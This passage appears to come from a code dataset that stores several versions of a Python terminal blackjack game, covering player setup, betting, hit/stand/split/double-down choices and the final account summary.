-- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\ndef cycle_decisions(players):\n dealer = players[-1]\n for p in players:\n if isinstance(p, people.Dealer):\n print(\n f\"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11).\"\n )\n sys.stdout.flush()\n time.sleep(0.8)\n if not check_status(p) and not p.check_hard_17():\n hit(p, dealer)\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05)\n if p.check_bust():\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n else:\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n if i.hand_value(j) > p.hand_value():\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n elif i.hand_value(j) < p.hand_value():\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n else:\n print(\n f'{i.name} tied with the {p.name}! 
No change. '\n , end='')\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n sys.stdout.flush()\n time.sleep(0.5)\n elif not p.check_blackjack() and not p.check_broke():\n do_decision(p, dealer)\n\n\ndef stand(player, dealer, hand_index=0):\n print(f'{player.name} stands.\\n')\n return True\n\n\ndef hit(player, dealer, hand_index=0):\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if isinstance(player, people.Dealer):\n while not player.check_hard_17() and not done:\n time.sleep(0.5)\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n else:\n choice = ''\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \").lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n while choice == 'y' and not done:\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \"\n ).lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n if not done:\n print()\n return True\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! 
Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\ndef double_down(player, dealer, hand_index=0):\n if player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n elif player.did_double_down:\n print('You can double down only once! Choose a different option.')\n return False\n player.bet *= 2\n player.did_double_down = True\n print(f'Bet increased to ${player.bet}!.')\n do_decision(player, dealer, hand_index)\n return True\n\n\ndef check_status(player, hand_index=0):\n done = False\n hand_string = '['\n for card in player.hand[hand_index][:-1]:\n hand_string += card.__str__() + ', '\n print(f'Current Hand: {hand_string}', end='')\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)\n time.sleep(0.5)\n if player.check_blackjack(hand_index):\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n elif player.check_bust(hand_index):\n disp_str_slow(' ==> BUST! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n else:\n print()\n return done\n\n\ndef play_again(players):\n print()\n all_broke = True\n for i in players:\n if not i.check_broke():\n all_broke = False\n if not all_broke:\n choice = input(\n \"Do you all want to play another round? 
Enter 'y' or 'n': \").lower(\n )\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n print()\n return choice\n else:\n print()\n return 'n'\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\ndef print_players(players):\n for player in players:\n print(player)\n\n\ndef main():\n display_instructions()\n num_players = get_num_players()\n players = create_players(num_players)\n dealer = people.Dealer(Deck(6))\n players.append(dealer)\n replay_choice = 'y'\n while replay_choice == 'y':\n reset(players)\n place_bets(players)\n for i in range(0, 2):\n deal(dealer, players)\n view_hands(players)\n cycle_decisions(players)\n replay_choice = play_again(players)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05)\n sys.stdout.flush()\n time.sleep(0.5)\n display_accounts(players)\n sys.stdout.flush()\n time.sleep(0.2)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n print('Goodbye!')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef display_instructions():\n print(\n \"\"\"\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 \"\"\"\n )\n print(\n 'as possible without going over. The numbered cards have the value of their number, face cards have '\n )\n print(\n \"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\\n\"\n )\n print(\n 'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '\n )\n print(\n \"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the \"\n )\n print(\n \"\"\"dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n\"\"\"\n )\n print(\n \" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many \"\n )\n print(\n ' times as wanted, up until the player busts (goes over 21). \\n'\n )\n print(\n \" Stand: To 'stand' means to stay with the current cards. \\n\"\n )\n print(\n \" Split: A player can 'split' only when the first two cards of his or her hand are the \"\n )\n print(\n ' same. When this occurs, the player makes two separate piles, one with each '\n )\n print(\n ' identical card, and places a bet identical to the initial bet for the second '\n )\n print(\n \"\"\" pile. Then, the player can hit or stand with each pile as in a normal round.\n\"\"\"\n )\n print(\n \" Double Down: When a player chooses to 'double down', he or she can increase the current bet \"\n )\n print(\n \"\"\" by 100% in exchange for agreeing to stand after being dealt one more card.\n\"\"\"\n )\n input('Ready to play? Hit any key to continue: ')\n print()\n\n\ndef get_num_players():\n num = input('How many people will be playing (up to 7)? Enter a number: ')\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\n num = input('Please enter a number from 1 to 7: ')\n print(\n \"\"\"\nGreat! 
Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n\"\"\"\n )\n time.sleep(1)\n return int(num)\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\ndef deal(dealer, players):\n for player in players[:-1]:\n if not player.check_broke():\n dealer.deal_card(player)\n dealer.deal_card(players[-1])\n\n\ndef place_bets(players):\n print('Now, each of you must place your bets.\\n')\n bets = []\n for player in players[:-1]:\n if not player.check_broke():\n bet = input(f'Bet for {player.name}: ')\n while not bet.isdigit() or int(bet) > player.money:\n msg = 'Please enter a whole number: '\n if bet.isdigit():\n msg = (\n \"You don't have enough money! Enter a different value: \"\n )\n bet = input(msg)\n player.bet = int(bet)\n print()\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! 
-- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\ndef cycle_decisions(players):\n dealer = players[-1]\n for p in players:\n if isinstance(p, people.Dealer):\n print(\n f\"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11).\"\n )\n sys.stdout.flush()\n time.sleep(0.8)\n if not check_status(p) and not p.check_hard_17():\n hit(p, dealer)\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05)\n if p.check_bust():\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n else:\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n if i.hand_value(j) > p.hand_value():\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n elif i.hand_value(j) < p.hand_value():\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n else:\n print(\n f'{i.name} tied with the {p.name}! 
No change. '\n , end='')\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n sys.stdout.flush()\n time.sleep(0.5)\n elif not p.check_blackjack() and not p.check_broke():\n do_decision(p, dealer)\n\n\ndef stand(player, dealer, hand_index=0):\n print(f'{player.name} stands.\\n')\n return True\n\n\ndef hit(player, dealer, hand_index=0):\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if isinstance(player, people.Dealer):\n while not player.check_hard_17() and not done:\n time.sleep(0.5)\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n else:\n choice = ''\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \").lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n while choice == 'y' and not done:\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \"\n ).lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n if not done:\n print()\n return True\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! 
Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\ndef double_down(player, dealer, hand_index=0):\n if player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n elif player.did_double_down:\n print('You can double down only once! Choose a different option.')\n return False\n player.bet *= 2\n player.did_double_down = True\n print(f'Bet increased to ${player.bet}!.')\n do_decision(player, dealer, hand_index)\n return True\n\n\ndef check_status(player, hand_index=0):\n done = False\n hand_string = '['\n for card in player.hand[hand_index][:-1]:\n hand_string += card.__str__() + ', '\n print(f'Current Hand: {hand_string}', end='')\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)\n time.sleep(0.5)\n if player.check_blackjack(hand_index):\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n elif player.check_bust(hand_index):\n disp_str_slow(' ==> BUST! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n else:\n print()\n return done\n\n\ndef play_again(players):\n print()\n all_broke = True\n for i in players:\n if not i.check_broke():\n all_broke = False\n if not all_broke:\n choice = input(\n \"Do you all want to play another round? 
Enter 'y' or 'n': \").lower(\n )\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n print()\n return choice\n else:\n print()\n return 'n'\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\ndef print_players(players):\n for player in players:\n print(player)\n\n\ndef main():\n display_instructions()\n num_players = get_num_players()\n players = create_players(num_players)\n dealer = people.Dealer(Deck(6))\n players.append(dealer)\n replay_choice = 'y'\n while replay_choice == 'y':\n reset(players)\n place_bets(players)\n for i in range(0, 2):\n deal(dealer, players)\n view_hands(players)\n cycle_decisions(players)\n replay_choice = play_again(players)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05)\n sys.stdout.flush()\n time.sleep(0.5)\n display_accounts(players)\n sys.stdout.flush()\n time.sleep(0.2)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n print('Goodbye!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from card import Card\nfrom deck import Deck\nimport people\nimport chip\nimport sys\nimport time\n\n\ndef display_instructions():\n print(\n \"\"\"\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 \"\"\"\n )\n print(\n 'as possible without going over. The numbered cards have the value of their number, face cards have '\n )\n print(\n \"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\\n\"\n )\n print(\n 'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '\n )\n print(\n \"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the \"\n )\n print(\n \"\"\"dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n\"\"\"\n )\n print(\n \" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many \"\n )\n print(\n ' times as wanted, up until the player busts (goes over 21). \\n'\n )\n print(\n \" Stand: To 'stand' means to stay with the current cards. \\n\"\n )\n print(\n \" Split: A player can 'split' only when the first two cards of his or her hand are the \"\n )\n print(\n ' same. When this occurs, the player makes two separate piles, one with each '\n )\n print(\n ' identical card, and places a bet identical to the initial bet for the second '\n )\n print(\n \"\"\" pile. Then, the player can hit or stand with each pile as in a normal round.\n\"\"\"\n )\n print(\n \" Double Down: When a player chooses to 'double down', he or she can increase the current bet \"\n )\n print(\n \"\"\" by 100% in exchange for agreeing to stand after being dealt one more card.\n\"\"\"\n )\n input('Ready to play? Hit any key to continue: ')\n print()\n\n\ndef get_num_players():\n num = input('How many people will be playing (up to 7)? 
Enter a number: ')\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\n num = input('Please enter a number from 1 to 7: ')\n print(\n \"\"\"\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n\"\"\"\n )\n time.sleep(1)\n return int(num)\n\n\ndef create_players(num):\n players_list = []\n for i in range(num):\n name = input(f'Player {i + 1}, what is your name? ')\n while name == '':\n name = input('Please enter your name: ')\n players_list.append(people.Player(name, 1000))\n print(\n '\\nAll players will begin the game with the same amount of $1,000 dollars.\\n'\n )\n return players_list\n\n\ndef deal(dealer, players):\n for player in players[:-1]:\n if not player.check_broke():\n dealer.deal_card(player)\n dealer.deal_card(players[-1])\n\n\ndef place_bets(players):\n print('Now, each of you must place your bets.\\n')\n bets = []\n for player in players[:-1]:\n if not player.check_broke():\n bet = input(f'Bet for {player.name}: ')\n while not bet.isdigit() or int(bet) > player.money:\n msg = 'Please enter a whole number: '\n if bet.isdigit():\n msg = (\n \"You don't have enough money! Enter a different value: \"\n )\n bet = input(msg)\n player.bet = int(bet)\n print()\n\n\ndef view_hands(players):\n print('Here are the hands for each player: \\n')\n for p in players:\n if isinstance(p, people.Dealer):\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')\n print()\n elif not p.check_broke():\n print(f'{p.name}: {p.hand}', end='')\n if p.check_blackjack():\n print(f' ==> BLACKJACK!!! 
-- {p.name} wins ${p.bet}!')\n else:\n print()\n print()\n\n\ndef do_decision(player, dealer, hand_index=0):\n choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}\n valid_choice = False\n while not valid_choice:\n choice = input(\n f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '\n )\n while choice.lower() not in choices_dict.keys():\n choice = input(\n \"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: \"\n )\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index)\n\n\ndef cycle_decisions(players):\n dealer = players[-1]\n for p in players:\n if isinstance(p, people.Dealer):\n print(\n f\"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11).\"\n )\n sys.stdout.flush()\n time.sleep(0.8)\n if not check_status(p) and not p.check_hard_17():\n hit(p, dealer)\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05)\n if p.check_bust():\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n else:\n for i in players[:-1]:\n if not i.check_broke():\n sys.stdout.flush()\n time.sleep(0.5)\n print(' ', end='')\n for j in range(0, len(i.hand)):\n if not i.check_bust(j):\n if i.hand_value(j) > p.hand_value():\n print(f'{i.name} wins ${i.bet}! ', end='')\n i.money += i.bet\n elif i.hand_value(j) < p.hand_value():\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n else:\n print(\n f'{i.name} tied with the {p.name}! 
No change. '\n , end='')\n else:\n print(f'{i.name} loses ${i.bet}! ', end='')\n i.money -= i.bet\n i.chips = chip.convert_to_chips(i.money)\n if i.check_broke():\n print(\n f\"Sorry {i.name}, but you're out of money and can no longer play in this game\"\n )\n else:\n print(\n f'Current Balance: ${i.money} (Chips: {i.chips})'\n )\n sys.stdout.flush()\n time.sleep(0.5)\n elif not p.check_blackjack() and not p.check_broke():\n do_decision(p, dealer)\n\n\ndef stand(player, dealer, hand_index=0):\n print(f'{player.name} stands.\\n')\n return True\n\n\ndef hit(player, dealer, hand_index=0):\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if isinstance(player, people.Dealer):\n while not player.check_hard_17() and not done:\n time.sleep(0.5)\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n else:\n choice = ''\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \").lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n while choice == 'y' and not done:\n dealer.deal_card(player, hand_index)\n done = check_status(player, hand_index)\n if not done:\n choice = input(\"Do you want to hit again ('y' or 'n')? \"\n ).lower()\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n if not done:\n print()\n return True\n\n\ndef split(player, dealer, hand_index=0):\n if player.hand[hand_index][0] != player.hand[hand_index][1]:\n print(\n \"You can't split on that hand! You need two identical cards to split. Choose again.\"\n )\n return False\n elif player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! 
Choose again.\"\n )\n return False\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]\n player.hand = hands\n print('Now you will play each hand separately: \\n')\n for i in range(0, 2):\n print(f'For Hand #{i + 1}: ')\n do_decision(player, dealer, i)\n return True\n\n\ndef double_down(player, dealer, hand_index=0):\n if player.bet * 2 > player.money:\n print(\n f\"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again.\"\n )\n return False\n elif player.did_double_down:\n print('You can double down only once! Choose a different option.')\n return False\n player.bet *= 2\n player.did_double_down = True\n print(f'Bet increased to ${player.bet}!.')\n do_decision(player, dealer, hand_index)\n return True\n\n\ndef check_status(player, hand_index=0):\n done = False\n hand_string = '['\n for card in player.hand[hand_index][:-1]:\n hand_string += card.__str__() + ', '\n print(f'Current Hand: {hand_string}', end='')\n sys.stdout.flush()\n time.sleep(0.5)\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)\n time.sleep(0.5)\n if player.check_blackjack(hand_index):\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n elif player.check_bust(hand_index):\n disp_str_slow(' ==> BUST! ', 0.05)\n if not isinstance(player, people.Dealer):\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)\n print('\\n\\n', end='')\n done = True\n sys.stdout.flush()\n time.sleep(0.5)\n else:\n print()\n return done\n\n\ndef play_again(players):\n print()\n all_broke = True\n for i in players:\n if not i.check_broke():\n all_broke = False\n if not all_broke:\n choice = input(\n \"Do you all want to play another round? 
Enter 'y' or 'n': \").lower(\n )\n while choice != 'y' and choice != 'n':\n choice = input(\"Enter either 'y' or 'n': \")\n print()\n return choice\n else:\n print()\n return 'n'\n\n\ndef reset(players):\n dealer = players[-1]\n for player in players:\n dealer.retrieve_cards(player)\n player.bet = 0\n\n\ndef display_accounts(players):\n for player in players[:-1]:\n change = player.money - player.initial_money\n word = 'gain'\n if change < 0:\n word = 'loss'\n print(\n f\"\"\" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n\"\"\"\n )\n sys.stdout.flush()\n time.sleep(0.5)\n\n\ndef disp_str_slow(phrase, t):\n for i in phrase:\n print(i, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\ndef print_players(players):\n for player in players:\n print(player)\n\n\ndef main():\n display_instructions()\n num_players = get_num_players()\n players = create_players(num_players)\n dealer = people.Dealer(Deck(6))\n players.append(dealer)\n replay_choice = 'y'\n while replay_choice == 'y':\n reset(players)\n place_bets(players)\n for i in range(0, 2):\n deal(dealer, players)\n view_hands(players)\n cycle_decisions(players)\n replay_choice = play_again(players)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05)\n sys.stdout.flush()\n time.sleep(0.5)\n display_accounts(players)\n sys.stdout.flush()\n time.sleep(0.2)\n print(\n \"\"\"------------------------------------------------------------------------------------------------\n\"\"\"\n )\n print('Goodbye!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from card import Card;\r\nfrom deck import Deck;\r\nimport people;\r\nimport chip;\r\nimport sys;\r\nimport time;\r\n\r\ndef display_instructions() :\r\n print('\\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 ');\r\n print('as possible without going over. The numbered cards have the value of their number, face cards have ');\r\n print('a value of 10 each, and the ace can either be counted as 1 or 11 (player\\'s choice)\\n');\r\n print('Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to ');\r\n print('each player (up to 7 players) and to the dealer. The player\\'s cards will be face up while one of the ');\r\n print('dealer\\'s cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \\n');\r\n print(' Hit: when a player \\'hits,\\' he or she is dealt another card. A player can hit as many ');\r\n print(' times as wanted, up until the player busts (goes over 21). \\n');\r\n print(' Stand: To \\'stand\\' means to stay with the current cards. \\n');\r\n print(' Split: A player can \\'split\\' only when the first two cards of his or her hand are the ');\r\n print(' same. When this occurs, the player makes two separate piles, one with each ');\r\n print(' identical card, and places a bet identical to the initial bet for the second ');\r\n print(' pile. Then, the player can hit or stand with each pile as in a normal round.\\n');\r\n print(' Double Down: When a player chooses to \\'double down\\', he or she can increase the current bet ');\r\n print(' by 100% in exchange for agreeing to stand after being dealt one more card.\\n');\r\n input('Ready to play? Hit any key to continue: ');\r\n print();\r\n \r\ndef get_num_players() :\r\n num = input('How many people will be playing (up to 7)? 
Enter a number: ');\r\n while not num.isdigit() or int(num) < 1 or int(num) > 7:\r\n num = input('Please enter a number from 1 to 7: ');\r\n print('\\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\\n');\r\n time.sleep(1);\r\n return int(num);\r\n \r\ndef create_players(num) :\r\n players_list = [];\r\n for i in range(num) :\r\n name = input(f'Player {i+1}, what is your name? ');\r\n while name == '':\r\n name = input('Please enter your name: ');\r\n players_list.append(people.Player(name, 1000));\r\n print('\\nAll players will begin the game with the same amount of $1,000 dollars.\\n');\r\n return players_list;\r\n \r\ndef deal(dealer, players) :\r\n for player in players[:-1] : \r\n if not player.check_broke() : dealer.deal_card(player);\r\n dealer.deal_card(players[-1]); # dealer deals card to dealer, too\r\n \r\ndef place_bets(players) :\r\n print('Now, each of you must place your bets.\\n');\r\n bets = [];\r\n for player in players[:-1] : # doesn't reach dealer\r\n if not player.check_broke() :\r\n bet = input(f'Bet for {player.name}: ');\r\n while not bet.isdigit() or int(bet) > player.money :\r\n msg = 'Please enter a whole number: ';\r\n if bet.isdigit() :\r\n msg = 'You don\\'t have enough money! Enter a different value: ';\r\n bet = input(msg);\r\n player.bet = int(bet);\r\n print(); \r\n \r\ndef view_hands(players) :\r\n print('Here are the hands for each player: \\n');\r\n for p in players :\r\n if isinstance(p, people.Dealer) :\r\n print(f'{p.name}: [{p.hand[0][0]}, ?]', end='');\r\n print();\r\n else :\r\n if not p.check_broke() :\r\n print(f'{p.name}: {p.hand}', end='');\r\n if p.check_blackjack() :\r\n print(f' ==> BLACKJACK!!! 
